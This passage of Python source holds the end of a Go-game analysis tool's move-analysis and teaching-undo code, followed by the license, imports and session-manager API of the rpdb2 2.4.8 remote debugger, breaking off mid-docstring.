Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (x, y) not in stones
]
visits = engine.config["fast_visits"]
self.katrain.controls.set_status(i18n._("sweep analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000_000_000
elif mode == "equalize":
if not cn.analysis_ready:
self.katrain.controls.set_status(i18n._("wait-before-equalize"), STATUS_INFO, self.current_node)
return
analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
visits = max(d["visits"] for d in cn.analysis["moves"].values())
self.katrain.controls.set_status(i18n._("equalizing analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000
else:
raise ValueError("Invalid analysis mode")
for move in analyze_moves:
cn.analyze(
engine, priority, visits=visits, refine_move=move, time_limit=False
) # explicitly requested so take as long as you need
def analyze_undo(self, node):
train_config = self.katrain.config("trainer")
move = node.move
if node != self.current_node or node.auto_undo is not None or not node.analysis_ready or not move:
return
points_lost = node.points_lost
thresholds = train_config["eval_thresholds"]
num_undo_prompts = train_config["num_undo_prompts"]
i = 0
while i < len(thresholds) and points_lost < thresholds[i]:
i += 1
num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
if num_undos == 0:
undo = False
elif num_undos < 1: # probability
undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
else:
undo = len(node.parent.children) <= num_undos
node.auto_undo = undo
if undo:
self.undo(1)
self.katrain.controls.set_status(
i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost), STATUS_TEACHING
)
self.katrain.update_state()
|
rpdb2.py
|
#! /usr/bin/env python
"""
rpdb2.py - version 2.4.8
A remote Python debugger for CPython
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
COPYRIGHT_NOTICE = """Copyright (C) 2005-2009 Nir Aides"""
CREDITS_NOTICE = """Work on version 2.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
if '.' in __name__:
raise ImportError('rpdb2 must not be imported as part of a package!')
import subprocess
import threading
import traceback
import zipimport
import tempfile
import __main__
import platform
import operator
import weakref
import os.path
import zipfile
import pickle
import socket
import getopt
import string
import random
import base64
import atexit
import locale
import codecs
import signal
import errno
import time
import copy
import hmac
import stat
import zlib
import sys
import cmd
import imp
import os
import re
try:
import hashlib
_md5 = hashlib.md5
except:
import md5
_md5 = md5
try:
import compiler
import sets
except:
pass
try:
import popen2
except:
pass
try:
from Crypto.Cipher import DES
except ImportError:
pass
#
# Pre-Import needed by my_abspath1
#
try:
from nt import _getfullpathname
except ImportError:
pass
try:
import SimpleXMLRPCServer
import xmlrpclib
import SocketServer
import commands
import copy_reg
import httplib
import thread
except:
#
# The above modules were renamed in Python 3 so try to import them 'as'
#
import xmlrpc.server as SimpleXMLRPCServer
import xmlrpc.client as xmlrpclib
import socketserver as SocketServer
import subprocess as commands
import copyreg as copy_reg
import http.client as httplib
import _thread as thread
#
# Needed in py3k path.
#
import numbers
#
#-------------------------------- Design Notes -------------------------------
#
"""
Design:
RPDB2 divides the world into two main parts: debugger and debuggee.
The debuggee is the script that needs to be debugged.
The debugger is another script that attaches to the debuggee for the
purpose of debugging.
Thus RPDB2 includes two main components: The debuggee-server that runs
in the debuggee and the session-manager that runs in the debugger.
The session manager and the debuggee-server communicate via XML-RPC.
The main classes are: CSessionManager and CDebuggeeServer
"""
#
#--------------------------------- Export functions ------------------------
#
TIMEOUT_FIVE_MINUTES = 5 * 60.0
def start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
depth = 0
):
"""
Use 'start_embedded_debugger' to invoke the debugger engine in embedded
scripts. Put the following line as the first line in your script:
import rpdb2; rpdb2.start_embedded_debugger(<some-password-string>)
This will cause the script to freeze until a debugger console attaches.
_rpdb2_pwd - The password that governs security of client/server communication.
fAllowUnencrypted - Allow unencrypted communications. Communication will
be authenticated but encrypted only if possible.
fAllowRemote - Allow debugger consoles from remote machines to connect.
timeout - Seconds to wait for attachment before giving up. Once the
timeout period expires, the debuggee will resume execution.
If None, never give up. If 0, do not wait at all.
source_provider - When script source is not available on file system it is
possible to specify a function that receives a "filename" and returns
its source. If filename specifies a file that does not fall under
the jurisdiction of this function it should raise IOError. If this
function is responsible for the specified file but the source is
not available it should raise IOError(SOURCE_NOT_AVAILABLE). You can
study the way source_provider_blender() works. Note that a misbehaving
function can break the debugger.
fDebug - debug output.
depth - Depth of the frame in which the debugger should be started. This
defaults to '0' so the top of stack will be in the code where
start_embedded_debugger is called.
IMPORTANT SECURITY NOTE:
USING A HARDCODED PASSWORD MAY BE INSECURE SINCE ANYONE WITH READ
PERMISSION TO THE SCRIPT WILL BE ABLE TO READ THE PASSWORD AND CONNECT TO
THE DEBUGGER AND DO WHATEVER THEY WISH VIA THE 'EXEC' DEBUGGER COMMAND.
It is safer to use: start_embedded_debugger_interactive_password()
"""
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
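#
# Editor's note: an illustrative sketch (not part of the original source) of
# embedding the debugger near the top of a script.  The password string and
# the 60 second timeout are placeholder values for the example.
#
#   import rpdb2
#   rpdb2.start_embedded_debugger('some-password', timeout = 60)
#   # Execution freezes here until a debugger console attaches or the timeout
#   # expires; the script then continues under the debugger.
#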
def start_embedded_debugger_interactive_password(
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
stdin = sys.stdin,
stdout = sys.stdout,
depth = 0
):
if g_server is not None:
return
while True:
if stdout is not None:
stdout.write('Please type password:')
_rpdb2_pwd = stdin.readline().rstrip('\n')
_rpdb2_pwd = as_unicode(_rpdb2_pwd, detect_encoding(stdin), fstrict = True)
try:
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
except BadArgument:
stdout.write(STR_PASSWORD_BAD)
def settrace():
"""
Trace threads that were created with thread.start_new_thread()
To trace, call this function from the thread target function.
NOTE: The main thread and any threads created with the threading module
are automatically traced, and there is no need to invoke this function
for them.
Note: This call does not pause the script.
"""
return __settrace()
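#
# Editor's note: an illustrative sketch (not part of the original source) of
# tracing a thread started with the low-level thread module.  The worker
# function is a placeholder.
#
#   def worker():
#       rpdb2.settrace()    # make this thread visible to the debugger
#       do_work()           # placeholder for the thread's real work
#
#   thread.start_new_thread(worker, ())
#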
def setbreak(depth = 0):
"""
Pause the script for inspection at the next script statement.
"""
return __setbreak(depth + 2)
def set_temp_breakpoint(path, scopename = '', lineno = 1):
"""
Set a temporary breakpoint in a file. path must be an absolute path.
scopename can either be an empty string or a fully qualified scope name
(For example u'g_debugger.m_bp_manager.set_temp_breakpoint'). lineno is
either relative to file start or to scope start.
To set a temporary breakpoint to hit when a file is first
imported or exec-uted call set_temp_breakpoint(path)
This function may throw a variety of exceptions.
"""
path = as_unicode(path, fstrict = True)
scopename = as_unicode(scopename, fstrict = True)
return __set_temp_breakpoint(path, scopename, lineno)
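#
# Editor's note: an illustrative sketch (not part of the original source); the
# absolute path and scope name below are placeholders.
#
#   # Break when the file is first imported or exec-uted:
#   rpdb2.set_temp_breakpoint('/home/user/myscript.py')
#
#   # Break inside a fully qualified scope of that file:
#   rpdb2.set_temp_breakpoint('/home/user/myscript.py', u'MyClass.run', 1)
#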
#
#----------------------------------- Interfaces ------------------------------
#
VERSION = (2, 4, 8, 0, 'Tychod')
RPDB_TITLE = "RPDB 2.4.8 - Tychod"
RPDB_VERSION = "RPDB_2_4_8"
RPDB_COMPATIBILITY_VERSION = "RPDB_2_4_0"
def get_version():
return RPDB_VERSION
def get_interface_compatibility_version():
return RPDB_COMPATIBILITY_VERSION
class CSimpleSessionManager:
"""
This is a wrapper class that simplifies launching and controlling of a
debuggee from within another program. For example, an IDE that launches
a script for debugging purposes can use this class to launch, debug and
stop a script.
"""
def __init__(self, fAllowUnencrypted = True):
self.__sm = CSessionManagerInternal(
_rpdb2_pwd = None,
fAllowUnencrypted = fAllowUnencrypted,
fAllowRemote = False,
host = LOCALHOST
)
self.m_fRunning = False
event_type_dict = {CEventUnhandledException: {}}
self.__sm.register_callback(self.__unhandled_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventState: {}}
self.__sm.register_callback(self.__state_calback, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.__sm.register_callback(self.__termination_callback, event_type_dict, fSingleUse = False)
def shutdown(self):
self.__sm.shutdown()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = False):
command_line = as_unicode(command_line, encoding, fstrict = True)
self.m_fRunning = False
self.__sm.launch(fchdir, command_line, fload_breakpoints)
def request_go(self):
self.__sm.request_go()
def detach(self):
self.__sm.detach()
def stop_debuggee(self):
self.__sm.stop_debuggee()
def get_session_manager(self):
return self.__sm
def prepare_attach(self):
"""
Use this method to attach a debugger to the debuggee after an
exception is caught.
"""
_rpdb2_pwd = self.__sm.get_password()
si = self.__sm.get_server_info()
rid = si.m_rid
if os.name == 'posix':
#
# On posix systems the password is set at the debuggee via
# a special temporary file.
#
create_pwd_file(rid, _rpdb2_pwd)
_rpdb2_pwd = None
return (rid, _rpdb2_pwd)
#
# Override these callbacks to react to the related events.
#
def unhandled_exception_callback(self):
_print('unhandled_exception_callback')
self.request_go()
def script_paused(self):
_print('script_paused')
self.request_go()
def script_terminated_callback(self):
_print('script_terminated_callback')
#
# Private Methods
#
def __unhandled_exception(self, event):
self.unhandled_exception_callback()
def __termination_callback(self, event):
self.script_terminated_callback()
def __state_calback(self, event):
"""
Handle state change notifications from the debuggee.
"""
if event.m_state != STATE_BROKEN:
return
if not self.m_fRunning:
#
# First break comes immediately after launch.
#
print_debug('Simple session manager continues on first break.')
self.m_fRunning = True
self.request_go()
return
if self.__sm.is_unhandled_exception():
return
sl = self.__sm.get_stack(tid_list = [], fAll = False)
if len(sl) == 0:
self.request_go()
return
st = sl[0]
s = st.get(DICT_KEY_STACK, [])
if len(s) == 0:
self.request_go()
return
e = s[-1]
function_name = e[2]
filename = os.path.basename(e[0])
if filename != DEBUGGER_FILENAME:
#
# This is a user breakpoint (e.g. rpdb2.setbreak())
#
self.script_paused()
return
#
# This is the setbreak() before a fork, exec or program
# termination.
#
self.request_go()
return
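#
# Editor's note: an illustrative sketch (not part of the original source) of
# how an IDE-style front end might use CSimpleSessionManager by overriding the
# callbacks it cares about.  The class and script names are placeholders.
#
#   class MyLauncher(CSimpleSessionManager):
#       def script_paused(self):
#           print('debuggee paused at a user breakpoint')
#           self.request_go()
#
#       def script_terminated_callback(self):
#           print('debuggee finished')
#
#   launcher = MyLauncher()
#   launcher.launch(fchdir = False, command_line = 'myscript.py')
#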
class CSessionManager:
"""
Interface to the session manager.
This is the interface through which the debugger controls and
communicates with the debuggee.
Accepted strings are either utf-8 or Unicode unless specified otherwise.
Returned strings are Unicode (also when embedded in data structures).
You can study the way it is used in StartClient()
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
if _rpdb2_pwd != None:
assert(is_valid_pwd(_rpdb2_pwd))
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
self.__smi = CSessionManagerInternal(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
host
)
def shutdown(self):
return self.__smi.shutdown()
def set_printer(self, printer):
"""
'printer' is a function that takes one argument and prints it.
You can study CConsoleInternal.printer() as an example of use
and rationale.
"""
return self.__smi.set_printer(printer)
def report_exception(self, type, value, tb):
"""
Sends exception information to the printer.
"""
return self.__smi.report_exception(type, value, tb)
def register_callback(self, callback, event_type_dict, fSingleUse):
"""
Receive events from the session manager.
The session manager communicates its state mainly by firing events.
You can study CConsoleInternal.__init__() as an example of use.
For details see CEventDispatcher.register_callback()
"""
return self.__smi.register_callback(
callback,
event_type_dict,
fSingleUse
)
def remove_callback(self, callback):
return self.__smi.remove_callback(callback)
def refresh(self):
"""
Fire again all relevant events needed to establish the current state.
"""
return self.__smi.refresh()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = True):
"""
Launch debuggee in a new process and attach.
fchdir - Change current directory to that of the debuggee.
command_line - command-line arguments passed to the script as a string.
fload_breakpoints - Load breakpoints of last session.
If command_line is not a Unicode string it will be decoded into Unicode
with the given encoding.
"""
command_line = as_unicode(command_line, encoding, fstrict = True)
return self.__smi.launch(fchdir, command_line, fload_breakpoints)
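#
# Editor's note: an illustrative sketch (not part of the original source); the
# command line below is a placeholder.
#
#   sm.launch(fchdir = True, command_line = 'myscript.py --verbose',
#             fload_breakpoints = True)
#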
def restart(self):
"""
Restart debug session with same command_line and fchdir arguments
which were used in last launch.
"""
return self.__smi.restart()
def get_launch_args(self):
"""
Return command_line and fchdir arguments which were used in last
launch as (last_fchdir, last_command_line).
Returns (None, None) if there is no info.
"""
return self.__smi.get_launch_args()
def attach(self, key, name = None, encoding = 'utf-8'):
"""
Attach to a debuggee (establish communication with the debuggee-server)
key - a string specifying part of the filename or PID of the debuggee.
If key is not a Unicode string it will be decoded into Unicode
with the given encoding.
"""
key = as_unicode(key, encoding, fstrict = True)
return self.__smi.attach(key, name)
def detach(self):
"""
Let the debuggee go...
"""
return self.__smi.detach()
def request_break(self):
return self.__smi.request_break()
def request_go(self):
return self.__smi.request_go()
def request_go_breakpoint(self, filename, scope, lineno):
"""
Go (run) until the specified location is reached.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
return self.__smi.request_go_breakpoint(filename, scope, lineno)
def request_step(self):
"""
Go until the next line of code is reached.
"""
return self.__smi.request_step()
def request_next(self):
"""
Go until the next line of code in the same scope is reached.
"""
return self.__smi.request_next()
def request_return(self):
"""
Go until end of scope is reached.
"""
return self.__smi.request_return()
def request_jump(self, lineno):
"""
Jump to the specified line number in the same scope.
"""
return self.__smi.request_jump(lineno)
#
# REVIEW: should return breakpoint ID
#
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr):
"""
Set a breakpoint.
filename - (Optional) can be either a file name or a module name,
full path, relative path or no path at all.
If filename is None or '', then the current module is
used.
scope - (Optional) Specifies a dot delimited scope for the
breakpoint, such as: foo or myClass.foo
lineno - (Optional) Specify a line within the selected file or
if a scope is specified, a zero-based offset from the
start of the scope.
expr - (Optional) A Python expression that will be evaluated
locally when the breakpoint is hit. The break will
occur only if the expression evaluates to true.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
expr = as_unicode(expr, fstrict = True)
return self.__smi.set_breakpoint(
filename,
scope,
lineno,
fEnabled,
expr
)
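#
# Editor's note: an illustrative sketch (not part of the original source); the
# file name, line number and expression below are placeholders.
#
#   # Break on line 12 of myscript.py only when the expression is true:
#   sm.set_breakpoint('myscript.py', '', 12, fEnabled = True, expr = 'x > 100')
#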
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - enable all breakpoints regardless of id_list.
"""
return self.__smi.enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - delete all breakpoints regardless of id_list.
"""
return self.__smi.delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
"""
Return breakpoints in a dictionary of id keys to CBreakPoint values
"""
return self.__smi.get_breakpoints()
def save_breakpoints(self, _filename = ''):
"""
Save breakpoints to file, locally (on the client side)
"""
return self.__smi.save_breakpoints(_filename)
def load_breakpoints(self, _filename = ''):
"""
Load breakpoints from file, locally (on the client side)
"""
return self.__smi.load_breakpoints(_filename)
def set_trap_unhandled_exceptions(self, ftrap):
"""
Set trap-unhandled-exceptions mode.
ftrap with a value of False means unhandled exceptions will be ignored.
The session manager default is True.
"""
return self.__smi.set_trap_unhandled_exceptions(ftrap)
def get_trap_unhandled_exceptions(self):
"""
Get trap-unhandled-exceptions mode.
"""
return self.__smi.get_trap_unhandled_exceptions()
def set_fork_mode(self, ffork_into_child, ffork_auto):
"""
Determine how to handle os.fork().
ffork_into_child - True|False - If True, the debugger will debug the
child process after a fork, otherwise the debugger will continue
to debug the parent process.
ffork_auto - True|False - If True, the debugger will not pause before
a fork and will automatically make a decision based on the
value of the ffork_into_child flag.
"""
return self.__smi.set_fork_mode(ffork_into_child, ffork_auto)
def get_fork_mode(self):
"""
Return the fork mode in the form of a (ffork_into_child, ffork_auto)
flags tuple.
"""
return self.__smi.get_fork_mode()
def get_stack(self, tid_list, fAll):
return self.__smi.get_stack(tid_list, fAll)
def get_source_file(self, filename, lineno, nlines):
filename = as_unicode(filename, fstrict = True)
return self.__smi.get_source_file(filename, lineno, nlines)
def get_source_lines(self, nlines, fAll):
return self.__smi.get_source_lines(nlines, fAll)
def set_frame_index(self, frame_index):
"""
Set frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.set_frame_index(frame_index)
def get_frame_index(self):
"""
Get frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.get_frame_index()
def set_analyze(self, fAnalyze):
"""
Toggle analyze mode. In analyze mode the stack switches to the
exception stack for examination.
"""
return self.__smi.set_analyze(fAnalyze)
def set_host(self, host):
"""
Set the host (string) on which to look for debuggees when attaching.
host can be a host name or IP address in string form.
"""
return self.__smi.set_host(host)
def get_host(self):
return self.__smi.get_host()
def calc_server_list(self):
"""
Calculate the list of servers (debuggable scripts) on the specified host.
Returns a tuple of a list and a dictionary.
The list contains CServerInfo objects sorted by their age,
oldest last.
The dictionary is a dictionary of errors that were encountered
during the building of the list. The dictionary has error (exception)
type as keys and number of occurrences as values.
"""
return self.__smi.calc_server_list()
def get_server_info(self):
"""
Return CServerInfo server info object that corresponds to the
server (debugged script) to which the session manager is
attached.
"""
return self.__smi.get_server_info()
def get_namespace(self, nl, filter_level, repr_limit = 128, fFilter = "DEPRECATED"):
"""
get_namespace is designed for locals/globals panes that let
the user inspect a namespace tree in GUI debuggers such as Winpdb.
You can study the way it is used in Winpdb.
nl - List of tuples, where each tuple is made of a python expression
as string and a flag that controls whether to "expand" the
value, that is, to return its children as well in case it has
children e.g. lists, dictionaries, etc...
filter_level - 0, 1, or 2. Filter out methods and functions from
classes and objects. (0 - None, 1 - Medium, 2 - Maximum).
repr_limit - Length limit (approximated) to be imposed on repr() of
returned items.
examples of expression lists:
[('x', False), ('y', False)]
[('locals()', True)]
[('a.b.c', False), ('my_object.foo', False), ('another_object', True)]
Return value is a list of dictionaries, where every element
in the list corresponds to an element in the input list 'nl'.
Each dictionary has the following keys and values:
DICT_KEY_EXPR - the original expression string.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the expression's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
DICT_KEY_SUBNODES - If the evaluated value has children and the
"expand" flag was set for this expression, then the
value of this key will be a list of dictionaries as
described below.
DICT_KEY_ERROR - If an error prevented evaluation of this expression
the value of this key will be a repr of the
exception info: repr(sys.exc_info())
Each dictionary for child items has the following keys and values:
DICT_KEY_EXPR - The Python expression that designates this child.
e.g. 'my_list[0]' designates the first child of the
list 'my_list'
DICT_KEY_NAME - a repr of the child name, e.g '0' for the first item
in a list.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the expression's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
"""
if fFilter != "DEPRECATED":
filter_level = fFilter
filter_level = int(filter_level)
return self.__smi.get_namespace(nl, filter_level, repr_limit)
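#
# Editor's note: an illustrative sketch (not part of the original source) of
# inspecting two expressions, expanding only the second.  The variable names
# are placeholders.
#
#   nl = [('x', False), ('my_list', True)]
#   for d in sm.get_namespace(nl, filter_level = 1):
#       print(d[DICT_KEY_EXPR], d[DICT_KEY_REPR], d[DICT_KEY_N_SUBNODES])
#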
#
# REVIEW: remove warning item.
#
def evaluate(self, expr):
"""
Evaluate a python expression in the context of the current thread
and frame.
Return value is a tuple (v, w, e) where v is a repr of the evaluated
expression value, w is always '', and e is an error string if an error
occurred.
NOTE: This call might not return since debugged script logic can lead
to temporary locking or even deadlocking.
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.evaluate(expr)
def execute(self, suite):
"""
Execute a python statement in the context of the current thread
and frame.
Return value is a tuple (w, e) where w and e are warning and
error strings (respectively) if an error occurred.
NOTE: This call might not return since debugged script logic can lead
